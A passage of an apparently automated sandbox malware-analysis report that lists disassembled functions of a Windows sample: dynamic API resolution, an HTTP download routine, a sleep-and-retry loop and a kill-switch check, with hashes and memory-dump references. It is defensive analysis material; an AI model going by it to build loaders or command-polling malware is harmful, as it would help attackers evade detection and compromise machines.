                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 06426b75c0c8b991ff4acc6c8644277e78d08d9e37dc1c9c3cd59271ecd98b5c
                              • Instruction ID: 3611c7231c8aef5dc4a13c8ec505bad129a687db5690f9517d4af1f51071dbc8
                              • Opcode Fuzzy Hash: 06426b75c0c8b991ff4acc6c8644277e78d08d9e37dc1c9c3cd59271ecd98b5c
                              • Instruction Fuzzy Hash: FBD05E7490030CDBDB04EFE4D8496DDBB78FB08311F000595D90562380EA305481CBA6
                              Function 00659C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 659c10-659c1a 634 65a036-65a0ca LoadLibraryA * 8 633->634 635 659c20-65a031 GetProcAddress * 43 633->635 636 65a146-65a14d 634->636 637 65a0cc-65a141 GetProcAddress * 5 634->637 635->634 638 65a216-65a21d 636->638 639 65a153-65a211 GetProcAddress * 8 636->639 637->636 640 65a21f-65a293 GetProcAddress * 5 638->640 641 65a298-65a29f 638->641 639->638 640->641 642 65a2a5-65a332 GetProcAddress * 6 641->642 643 65a337-65a33e 641->643 642->643 644 65a344-65a41a GetProcAddress * 9 643->644 645 65a41f-65a426 643->645 644->645 646 65a4a2-65a4a9 645->646 647 65a428-65a49d GetProcAddress * 5 645->647 648 65a4dc-65a4e3 646->648 649 65a4ab-65a4d7 GetProcAddress * 2 646->649 647->646 650 65a515-65a51c 648->650 651 65a4e5-65a510 GetProcAddress * 2 648->651 649->648 652 65a612-65a619 650->652 653 65a522-65a60d GetProcAddress * 10 650->653 651->650 654 65a67d-65a684 652->654 655 65a61b-65a678 GetProcAddress * 4 652->655 653->652 656 65a686-65a699 GetProcAddress 654->656 657 65a69e-65a6a5 654->657 655->654 656->657 658 65a6a7-65a703 GetProcAddress * 4 657->658 659 65a708-65a709 657->659 658->659
                              APIs
                              • GetProcAddress.KERNEL32(76210000,013C5110), ref: 00659C2D
                              • GetProcAddress.KERNEL32(76210000,013C5250), ref: 00659C45
                              • GetProcAddress.KERNEL32(76210000,013D8F90), ref: 00659C5E
                              • GetProcAddress.KERNEL32(76210000,013D9008), ref: 00659C76
                              • GetProcAddress.KERNEL32(76210000,013D8FA8), ref: 00659C8E
                              • GetProcAddress.KERNEL32(76210000,013DD7C8), ref: 00659CA7
                              • GetProcAddress.KERNEL32(76210000,013CA828), ref: 00659CBF
                              • GetProcAddress.KERNEL32(76210000,013DD630), ref: 00659CD7
                              • GetProcAddress.KERNEL32(76210000,013DD708), ref: 00659CF0
                              • GetProcAddress.KERNEL32(76210000,013DD690), ref: 00659D08
                              • GetProcAddress.KERNEL32(76210000,013DD7E0), ref: 00659D20
                              • GetProcAddress.KERNEL32(76210000,013C5130), ref: 00659D39
                              • GetProcAddress.KERNEL32(76210000,013C4FB0), ref: 00659D51
                              • GetProcAddress.KERNEL32(76210000,013C5030), ref: 00659D69
                              • GetProcAddress.KERNEL32(76210000,013C5150), ref: 00659D82
                              • GetProcAddress.KERNEL32(76210000,013DD768), ref: 00659D9A
                              • GetProcAddress.KERNEL32(76210000,013DD6F0), ref: 00659DB2
                              • GetProcAddress.KERNEL32(76210000,013CA800), ref: 00659DCB
                              • GetProcAddress.KERNEL32(76210000,013C5190), ref: 00659DE3
                              • GetProcAddress.KERNEL32(76210000,013DD660), ref: 00659DFB
                              • GetProcAddress.KERNEL32(76210000,013DD780), ref: 00659E14
                              • GetProcAddress.KERNEL32(76210000,013DD720), ref: 00659E2C
                              • GetProcAddress.KERNEL32(76210000,013DD6D8), ref: 00659E44
                              • GetProcAddress.KERNEL32(76210000,013C5350), ref: 00659E5D
                              • GetProcAddress.KERNEL32(76210000,013DD738), ref: 00659E75
                              • GetProcAddress.KERNEL32(76210000,013DD648), ref: 00659E8D
                              • GetProcAddress.KERNEL32(76210000,013DD750), ref: 00659EA6
                              • GetProcAddress.KERNEL32(76210000,013DD798), ref: 00659EBE
                              • GetProcAddress.KERNEL32(76210000,013DD6A8), ref: 00659ED6
                              • GetProcAddress.KERNEL32(76210000,013DD7B0), ref: 00659EEF
                              • GetProcAddress.KERNEL32(76210000,013DD6C0), ref: 00659F07
                              • GetProcAddress.KERNEL32(76210000,013DD678), ref: 00659F1F
                              • GetProcAddress.KERNEL32(76210000,013DD1F8), ref: 00659F38
                              • GetProcAddress.KERNEL32(76210000,013D0298), ref: 00659F50
                              • GetProcAddress.KERNEL32(76210000,013DD270), ref: 00659F68
                              • GetProcAddress.KERNEL32(76210000,013DD318), ref: 00659F81
                              • GetProcAddress.KERNEL32(76210000,013C51D0), ref: 00659F99
                              • GetProcAddress.KERNEL32(76210000,013DD258), ref: 00659FB1
                              • GetProcAddress.KERNEL32(76210000,013C5210), ref: 00659FCA
                              • GetProcAddress.KERNEL32(76210000,013DD0D8), ref: 00659FE2
                              • GetProcAddress.KERNEL32(76210000,013DD150), ref: 00659FFA
                              • GetProcAddress.KERNEL32(76210000,013C5290), ref: 0065A013
                              • GetProcAddress.KERNEL32(76210000,013C5330), ref: 0065A02B
                              • LoadLibraryA.KERNEL32(013DD288,?,00655CA3,00660AEB,?,?,?,?,?,?,?,?,?,?,00660AEA,00660AE3), ref: 0065A03D
                              • LoadLibraryA.KERNEL32(013DD030,?,00655CA3,00660AEB,?,?,?,?,?,?,?,?,?,?,00660AEA,00660AE3), ref: 0065A04E
                              • LoadLibraryA.KERNEL32(013DD2A0,?,00655CA3,00660AEB,?,?,?,?,?,?,?,?,?,?,00660AEA,00660AE3), ref: 0065A060
                              • LoadLibraryA.KERNEL32(013DD048,?,00655CA3,00660AEB,?,?,?,?,?,?,?,?,?,?,00660AEA,00660AE3), ref: 0065A072
                              • LoadLibraryA.KERNEL32(013DD198,?,00655CA3,00660AEB,?,?,?,?,?,?,?,?,?,?,00660AEA,00660AE3), ref: 0065A083
                              • LoadLibraryA.KERNEL32(013DD2B8,?,00655CA3,00660AEB,?,?,?,?,?,?,?,?,?,?,00660AEA,00660AE3), ref: 0065A095
                              • LoadLibraryA.KERNEL32(013DD1C8,?,00655CA3,00660AEB,?,?,?,?,?,?,?,?,?,?,00660AEA,00660AE3), ref: 0065A0A7
                              • LoadLibraryA.KERNEL32(013DD2D0,?,00655CA3,00660AEB,?,?,?,?,?,?,?,?,?,?,00660AEA,00660AE3), ref: 0065A0B8
                              • GetProcAddress.KERNEL32(751E0000,013C52D0), ref: 0065A0DA
                              • GetProcAddress.KERNEL32(751E0000,013DD090), ref: 0065A0F2
                              • GetProcAddress.KERNEL32(751E0000,013D8AC8), ref: 0065A10A
                              • GetProcAddress.KERNEL32(751E0000,013DD2E8), ref: 0065A123
                              • GetProcAddress.KERNEL32(751E0000,013C52F0), ref: 0065A13B
                              • GetProcAddress.KERNEL32(73FC0000,013CA580), ref: 0065A160
                              • GetProcAddress.KERNEL32(73FC0000,013C5670), ref: 0065A179
                              • GetProcAddress.KERNEL32(73FC0000,013CA698), ref: 0065A191
                              • GetProcAddress.KERNEL32(73FC0000,013DD300), ref: 0065A1A9
                              • GetProcAddress.KERNEL32(73FC0000,013DD060), ref: 0065A1C2
                              • GetProcAddress.KERNEL32(73FC0000,013C5410), ref: 0065A1DA
                              • GetProcAddress.KERNEL32(73FC0000,013C53B0), ref: 0065A1F2
                              • GetProcAddress.KERNEL32(73FC0000,013DD078), ref: 0065A20B
                              • GetProcAddress.KERNEL32(753A0000,013C5550), ref: 0065A22C
                              • GetProcAddress.KERNEL32(753A0000,013C5470), ref: 0065A244
                              • GetProcAddress.KERNEL32(753A0000,013DD0A8), ref: 0065A25D
                              • GetProcAddress.KERNEL32(753A0000,013DD0C0), ref: 0065A275
                              • GetProcAddress.KERNEL32(753A0000,013C5510), ref: 0065A28D
                              • GetProcAddress.KERNEL32(76310000,013CA850), ref: 0065A2B3
                              • GetProcAddress.KERNEL32(76310000,013CA468), ref: 0065A2CB
                              • GetProcAddress.KERNEL32(76310000,013DD1E0), ref: 0065A2E3
                              • GetProcAddress.KERNEL32(76310000,013C5490), ref: 0065A2FC
                              • GetProcAddress.KERNEL32(76310000,013C5570), ref: 0065A314
                              • GetProcAddress.KERNEL32(76310000,013CA508), ref: 0065A32C
                              • GetProcAddress.KERNEL32(76910000,013DD0F0), ref: 0065A352
                              • GetProcAddress.KERNEL32(76910000,013C55B0), ref: 0065A36A
                              • GetProcAddress.KERNEL32(76910000,013D8AE8), ref: 0065A382
                              • GetProcAddress.KERNEL32(76910000,013DD108), ref: 0065A39B
                              • GetProcAddress.KERNEL32(76910000,013DD120), ref: 0065A3B3
                              • GetProcAddress.KERNEL32(76910000,013C53F0), ref: 0065A3CB
                              • GetProcAddress.KERNEL32(76910000,013C5430), ref: 0065A3E4
                              • GetProcAddress.KERNEL32(76910000,013DD138), ref: 0065A3FC
                              • GetProcAddress.KERNEL32(76910000,013DD210), ref: 0065A414
                              • GetProcAddress.KERNEL32(75B30000,013C5450), ref: 0065A436
                              • GetProcAddress.KERNEL32(75B30000,013DD168), ref: 0065A44E
                              • GetProcAddress.KERNEL32(75B30000,013DD180), ref: 0065A466
                              • GetProcAddress.KERNEL32(75B30000,013DD228), ref: 0065A47F
                              • GetProcAddress.KERNEL32(75B30000,013DD1B0), ref: 0065A497
                              • GetProcAddress.KERNEL32(75670000,013C5690), ref: 0065A4B8
                              • GetProcAddress.KERNEL32(75670000,013C5390), ref: 0065A4D1
                              • GetProcAddress.KERNEL32(76AC0000,013C54B0), ref: 0065A4F2
                              • GetProcAddress.KERNEL32(76AC0000,013DD240), ref: 0065A50A
                              • GetProcAddress.KERNEL32(6F4D0000,013C55D0), ref: 0065A530
                              • GetProcAddress.KERNEL32(6F4D0000,013C5610), ref: 0065A548
                              • GetProcAddress.KERNEL32(6F4D0000,013C5630), ref: 0065A560
                              • GetProcAddress.KERNEL32(6F4D0000,013DD558), ref: 0065A579
                              • GetProcAddress.KERNEL32(6F4D0000,013C54D0), ref: 0065A591
                              • GetProcAddress.KERNEL32(6F4D0000,013C56B0), ref: 0065A5A9
                              • GetProcAddress.KERNEL32(6F4D0000,013C56D0), ref: 0065A5C2
                              • GetProcAddress.KERNEL32(6F4D0000,013C53D0), ref: 0065A5DA
                              • GetProcAddress.KERNEL32(6F4D0000,InternetSetOptionA), ref: 0065A5F1
                              • GetProcAddress.KERNEL32(6F4D0000,HttpQueryInfoA), ref: 0065A607
                              • GetProcAddress.KERNEL32(75AE0000,013DD618), ref: 0065A629
                              • GetProcAddress.KERNEL32(75AE0000,013D8A98), ref: 0065A641
                              • GetProcAddress.KERNEL32(75AE0000,013DD360), ref: 0065A659
                              • GetProcAddress.KERNEL32(75AE0000,013DD588), ref: 0065A672
                              • GetProcAddress.KERNEL32(76300000,013C55F0), ref: 0065A693
                              • GetProcAddress.KERNEL32(6FE10000,013DD4F8), ref: 0065A6B4
                              • GetProcAddress.KERNEL32(6FE10000,013C54F0), ref: 0065A6CD
                              • GetProcAddress.KERNEL32(6FE10000,013DD480), ref: 0065A6E5
                              • GetProcAddress.KERNEL32(6FE10000,013DD390), ref: 0065A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: eb4c7b92946a35639b15a86e62e1549b3765b84a41fd26caabb4c89598ff2d40
                              • Instruction ID: afc549038a25e7820900cf8aadb43d4430cae6f0d0cee5c55788fd42bce147c9
                              • Opcode Fuzzy Hash: eb4c7b92946a35639b15a86e62e1549b3765b84a41fd26caabb4c89598ff2d40
                              • Instruction Fuzzy Hash: AD621CB5500200AFF75CEFACED8896637F9F74C701714852BA649C32E4D739A852EB62
                              Function 00646280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 646280-64630b call 65a7a0 call 6447b0 call 65a740 InternetOpenA StrCmpCA 1040 646314-646318 1033->1040 1041 64630d 1033->1041 1042 64631e-646342 InternetConnectA 1040->1042 1043 646509-646525 call 65a7a0 call 65a800 * 2 1040->1043 1041->1040 1044 6464ff-646503 InternetCloseHandle 1042->1044 1045 646348-64634c 1042->1045 1061 646528-64652d 1043->1061 1044->1043 1047 64634e-646358 1045->1047 1048 64635a 1045->1048 1051 646364-646392 HttpOpenRequestA 1047->1051 1048->1051 1053 6464f5-6464f9 InternetCloseHandle 1051->1053 1054 646398-64639c 1051->1054 1053->1044 1056 6463c5-646405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 64639e-6463bf InternetSetOptionA 1054->1057 1059 646407-646427 call 65a740 call 65a800 * 2 1056->1059 1060 64642c-64644b call 658940 1056->1060 1057->1056 1059->1061 1067 64644d-646454 1060->1067 1068 6464c9-6464e9 call 65a740 call 65a800 * 2 1060->1068 1071 646456-646480 InternetReadFile 1067->1071 1072 6464c7-6464ef InternetCloseHandle 1067->1072 1068->1061 1076 646482-646489 1071->1076 1077 64648b 1071->1077 1072->1053 1076->1077 1080 64648d-6464c5 call 65a9b0 call 65a8a0 call 65a800 1076->1080 1077->1072 1080->1071
                              APIs
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 006447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00644839
                                • Part of subcall function 006447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00644849
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • InternetOpenA.WININET(00660DFE,00000001,00000000,00000000,00000000), ref: 006462E1
                              • StrCmpCA.SHLWAPI(?,013DEC50), ref: 00646303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00646335
                              • HttpOpenRequestA.WININET(00000000,GET,?,013DE238,00000000,00000000,00400100,00000000), ref: 00646385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006463BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006463D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006463FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0064646D
                              • InternetCloseHandle.WININET(00000000), ref: 006464EF
                              • InternetCloseHandle.WININET(00000000), ref: 006464F9
                              • InternetCloseHandle.WININET(00000000), ref: 00646503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: deedefffaaaa8f68a098c7f2ad0a21ad6d832198b681207ea8433e92465ee125
                              • Instruction ID: 223be3aae865a97de699cbdc1093f131c4e2a7686ac2b087ecc98b866f02e452
                              • Opcode Fuzzy Hash: deedefffaaaa8f68a098c7f2ad0a21ad6d832198b681207ea8433e92465ee125
                              • Instruction Fuzzy Hash: 94714F71A00218ABEF24DFE4CC45BEE77BABB45701F108159F50A6B1D0DBB46A89CF52
                              Function 00655510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 655510-655577 call 655ad0 call 65a820 * 3 call 65a740 * 4 1106 65557c-655583 1090->1106 1107 655585-6555b6 call 65a820 call 65a7a0 call 641590 call 6551f0 1106->1107 1108 6555d7-65564c call 65a740 * 2 call 641590 call 6552c0 call 65a8a0 call 65a800 call 65aad0 StrCmpCA 1106->1108 1124 6555bb-6555d2 call 65a8a0 call 65a800 1107->1124 1134 655693-6556a9 call 65aad0 StrCmpCA 1108->1134 1138 65564e-65568e call 65a7a0 call 641590 call 6551f0 call 65a8a0 call 65a800 1108->1138 1124->1134 1139 6557dc-655844 call 65a8a0 call 65a820 * 2 call 641670 call 65a800 * 4 call 656560 call 641550 1134->1139 1140 6556af-6556b6 1134->1140 1138->1134 1269 655ac3-655ac6 1139->1269 1142 6556bc-6556c3 1140->1142 1143 6557da-65585f call 65aad0 StrCmpCA 1140->1143 1147 6556c5-655719 call 65a820 call 65a7a0 call 641590 call 6551f0 call 65a8a0 call 65a800 1142->1147 1148 65571e-655793 call 65a740 * 2 call 641590 call 6552c0 call 65a8a0 call 65a800 call 65aad0 StrCmpCA 1142->1148 1162 655865-65586c 1143->1162 1163 655991-6559f9 call 65a8a0 call 65a820 * 2 call 641670 call 65a800 * 4 call 656560 call 641550 1143->1163 1147->1143 1148->1143 1246 655795-6557d5 call 65a7a0 call 641590 call 6551f0 call 65a8a0 call 65a800 1148->1246 1169 655872-655879 1162->1169 1170 65598f-655a14 call 65aad0 StrCmpCA 1162->1170 1163->1269 1177 6558d3-655948 call 65a740 * 2 call 641590 call 6552c0 call 65a8a0 call 65a800 call 65aad0 StrCmpCA 1169->1177 1178 65587b-6558ce call 65a820 call 65a7a0 call 641590 call 6551f0 call 65a8a0 call 65a800 1169->1178 1198 655a16-655a21 Sleep 1170->1198 1199 655a28-655a91 call 65a8a0 call 65a820 * 2 call 641670 call 65a800 * 4 call 656560 call 641550 1170->1199 1177->1170 1275 65594a-65598a call 65a7a0 call 641590 call 6551f0 call 65a8a0 call 65a800 1177->1275 1178->1170 1198->1106 1199->1269 1246->1143 1275->1170
                              APIs
                                • Part of subcall function 0065A820: lstrlen.KERNEL32(00644F05,?,?,00644F05,00660DDE), ref: 0065A82B
                                • Part of subcall function 0065A820: lstrcpy.KERNEL32(00660DDE,00000000), ref: 0065A885
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00655644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006556A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00655857
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 006551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00655228
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 006552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00655318
                                • Part of subcall function 006552C0: lstrlen.KERNEL32(00000000), ref: 0065532F
                                • Part of subcall function 006552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00655364
                                • Part of subcall function 006552C0: lstrlen.KERNEL32(00000000), ref: 00655383
                                • Part of subcall function 006552C0: lstrlen.KERNEL32(00000000), ref: 006553AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0065578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00655940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00655A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00655A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: bb391309144d52dad249c79d91d9172c4cc37df67d6fbee72b5717beb9c0776c
                              • Instruction ID: a8b130f4e5a22889510838e562b99b03586da1156452fb7e4de20a876af780a9
                              • Opcode Fuzzy Hash: bb391309144d52dad249c79d91d9172c4cc37df67d6fbee72b5717beb9c0776c
                              • Instruction Fuzzy Hash: F3E140719101049ADB58FBF4DC66AED733ABF54301F40822DB90766191EF34AB4DCBA6
                              Function 006517A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 6517a0-6517cd call 65aad0 StrCmpCA 1304 6517d7-6517f1 call 65aad0 1301->1304 1305 6517cf-6517d1 ExitProcess 1301->1305 1309 6517f4-6517f8 1304->1309 1310 6519c2-6519cd call 65a800 1309->1310 1311 6517fe-651811 1309->1311 1313 651817-65181a 1311->1313 1314 65199e-6519bd 1311->1314 1316 651821-651830 call 65a820 1313->1316 1317 6518ad-6518be StrCmpCA 1313->1317 1318 6518cf-6518e0 StrCmpCA 1313->1318 1319 65198f-651999 call 65a820 1313->1319 1320 651849-651858 call 65a820 1313->1320 1321 651835-651844 call 65a820 1313->1321 1322 6518f1-651902 StrCmpCA 1313->1322 1323 651951-651962 StrCmpCA 1313->1323 1324 651970-651981 StrCmpCA 1313->1324 1325 651913-651924 StrCmpCA 1313->1325 1326 651932-651943 StrCmpCA 1313->1326 1327 65185d-65186e StrCmpCA 1313->1327 1328 65187f-651890 StrCmpCA 1313->1328 1314->1309 1316->1314 1339 6518c0-6518c3 1317->1339 1340 6518ca 1317->1340 1341 6518e2-6518e5 1318->1341 1342 6518ec 1318->1342 1319->1314 1320->1314 1321->1314 1343 651904-651907 1322->1343 1344 65190e 1322->1344 1349 651964-651967 1323->1349 1350 65196e 1323->1350 1329 651983-651986 1324->1329 1330 65198d 1324->1330 1345 651926-651929 1325->1345 1346 651930 1325->1346 1347 651945-651948 1326->1347 1348 65194f 1326->1348 1335 651870-651873 1327->1335 1336 65187a 1327->1336 1337 651892-65189c 1328->1337 1338 65189e-6518a1 1328->1338 1329->1330 1330->1314 1335->1336 1336->1314 1355 6518a8 1337->1355 1338->1355 1339->1340 1340->1314 1341->1342 1342->1314 1343->1344 1344->1314 1345->1346 1346->1314 1347->1348 1348->1314 1349->1350 1350->1314 1355->1314
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 006517C5
                              • ExitProcess.KERNEL32 ref: 006517D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: fb0910648c83645c50d2b80d5c276197fe004c43f7dad280c6aeb377545eff0a
                              • Instruction ID: 4e09b309dfd997105c824c217b75fd5c2f9a0d222094bfeb231ef9cb363f045a
